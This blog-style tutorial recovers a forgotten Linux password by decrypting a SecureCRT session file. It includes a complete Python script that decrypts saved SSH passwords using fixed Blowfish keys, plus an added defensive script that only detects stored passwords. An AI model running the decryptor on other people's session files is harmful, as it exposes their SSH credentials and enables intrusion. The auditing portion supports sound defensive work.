Using Python to retrieve the Linux login password in SecureCRT

Keywords: Python Linux Session ssh

A Linux system was installed in the virtual machine on the notebook. It didn't work for a while. Suddenly, when it was used, I found that the password had been forgotten.
Fortunately, I have used SecureCRT to connect to this Linux system before, so I can easily use Python to retrieve the password.

Final effect

The red box indicates the password

Get ready

Download and install Python, and add it to the system environment variables. I use Python 2.7 here.

Python dependency package

Download the Python decryption dependency package (PyCrypto): https://pypi.python.org/pypi/...
Unzip the file, open a command-line tool in the unzipped directory, and run the following commands

python setup.py build
python setup.py install

If the following situation occurs

There is another way to install it.
Download the build that matches your own environment here: http://www.voidspace.org.uk/p...

My download is PyCrypto 2.6 for Python 2.7 32bit

Download the installer and run it directly

Start recovering the password

Find the location where SecureCRT stores the password
*<User name>\AppData\Roaming\VanDyke\Config\Sessions*
or
*Data\Settings\Config\Sessions under the software directory*

I have 10.0.0.100.ini

Copy the following code and save it in the above directory as secureDecode.py

from Crypto.Cipher import Blowfish
import argparse
import re

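def decrypt(password) :
    # Both Blowfish keys are fixed constants in this script; no per-user secret is involved,
    # so anyone who can read the session file can recover the saved password.
    c1 = Blowfish.new('5F B0 45 A2 94 17 D9 16 C6 C6 A2 FF 06 41 82 B7'.replace(' ','').decode('hex'), Blowfish.MODE_CBC, '\x00'*8)
    c2 = Blowfish.new('24 A6 3D DE 5B D3 B3 82 9C 7E 06 F4 08 16 AA 07'.replace(' ','').decode('hex'), Blowfish.MODE_CBC, '\x00'*8)
    # Decrypt with the second key, drop 4 bytes from each end, then decrypt with the first key.
    padded = c1.decrypt(c2.decrypt(password.decode('hex'))[4:-4])
    p = ''
    # The plaintext is UTF-16 terminated by a double NUL; stop at the terminator,
    # or at the end of the data so a missing terminator cannot loop forever.
    while padded and padded[:2] != '\x00\x00' :
        p += padded[:2]
        padded = padded[2:]
    return p.decode('UTF-16')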

REGEX_HOSTNAME = re.compile(ur'S:"Hostname"=([^\r\n]*)')
REGEX_PASWORD = re.compile(ur'S:"Password"=u([0-9a-f]+)')
REGEX_PORT = re.compile(ur'D:"\[SSH2\] Port"=([0-9a-f]{8})')
REGEX_USERNAME = re.compile(ur'S:"Username"=([^\r\n]*)')

def hostname(x) :
    m = REGEX_HOSTNAME.search(x)
    if m :
        return m.group(1)
    return '???'

def password(x) :
    m = REGEX_PASWORD.search(x)
    if m :
        return decrypt(m.group(1))
    return '???'

def port(x) :
    m = REGEX_PORT.search(x)
    if m :
        return '-p %d '%(int(m.group(1), 16))
    return ''

def username(x) :
    m = REGEX_USERNAME.search(x)
    if m :
        return m.group(1) + '@'
    return ''

parser = argparse.ArgumentParser(description='Tool to decrypt SSHv2 passwords in VanDyke Secure CRT session files')
parser.add_argument('files', type=argparse.FileType('r'), nargs='+',
    help='session file(s)')

args = parser.parse_args()

for f in args.files :
    c = f.read().replace('\x00', '')
    print f.name
    print "ssh %s%s%s # %s"%(port(c), username(c), hostname(c), password(c))

Then use the command line tool to enter the directory and run the following command

python secureDecode.py 10.0.0.100.ini

Finally, the password was retrieved successfully
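
Seen from the defender's side, the same field patterns can be used to find which session files still hold a saved password in this reversible format, without decrypting anything. The following is an added example in Python 3, not part of the original post; the function names and the sample session contents are constructed for illustration.

```python
import re
from pathlib import Path

# Field patterns reused from the script on this page (Python 3 syntax).
RE_HOSTNAME = re.compile(r'S:"Hostname"=([^\r\n]*)')
RE_USERNAME = re.compile(r'S:"Username"=([^\r\n]*)')
RE_PASSWORD = re.compile(r'S:"Password"=u([0-9a-f]+)')

def audit_session(name, raw):
    """Return a finding if the session data holds a saved password, else None.

    The ciphertext is only detected, never decrypted or echoed.
    """
    # Like the page's script, drop NUL bytes so UTF-16 files match too.
    text = raw.replace(b'\x00', b'').decode('latin-1')
    if not RE_PASSWORD.search(text):
        return None
    host = RE_HOSTNAME.search(text)
    user = RE_USERNAME.search(text)
    return {
        'file': name,
        'hostname': host.group(1) if host else '???',
        'username': user.group(1) if user else '',
    }

def audit_directory(sessions_dir):
    """Scan every .ini file under a Sessions directory (hypothetical helper)."""
    findings = []
    for path in sorted(Path(sessions_dir).rglob('*.ini')):
        hit = audit_session(path.name, path.read_bytes())
        if hit:
            findings.append(hit)
    return findings

# Constructed sample data: the hex string is a placeholder, not a real ciphertext.
SAMPLE_SAVED = ('S:"Hostname"=10.0.0.100\r\n'
                'S:"Username"=root\r\n'
                'S:"Password"=u' + '0123456789abcdef' * 3 + '\r\n').encode('utf-16-le')
SAMPLE_EMPTY = b'S:"Hostname"=10.0.0.101\r\nS:"Username"=admin\r\nS:"Password"=\r\n'

if __name__ == '__main__':
    for label, raw in (('saved.ini', SAMPLE_SAVED), ('empty.ini', SAMPLE_EMPTY)):
        print(label, audit_session(label, raw))
```

Any session this lists should have its saved password cleared in SecureCRT, and the account password changed if the file may have been read by someone else.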


Posted by .-INSANE-. on Thu, 12 Dec 2019 13:31:07 -0800